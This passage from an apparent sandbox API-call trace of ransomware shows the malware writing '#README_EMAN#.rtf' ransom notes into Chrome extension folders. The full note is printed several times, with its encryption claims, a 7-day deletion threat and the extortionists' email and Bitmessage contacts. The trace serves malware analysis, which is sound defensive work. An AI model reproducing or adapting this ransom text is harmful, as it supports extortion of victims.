butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.203] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.204] CloseHandle (hObject=0x2ec) returned 1 [0291.204] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\#readme_eman#.rtf")) returned 0x20 [0291.204] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\#readme_eman#.rtf")) returned 0x20 [0291.204] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\#readme_eman#.rtf")) returned 0xffffffff [0291.204] GetLastError () returned 0x2 [0291.204] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\af\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 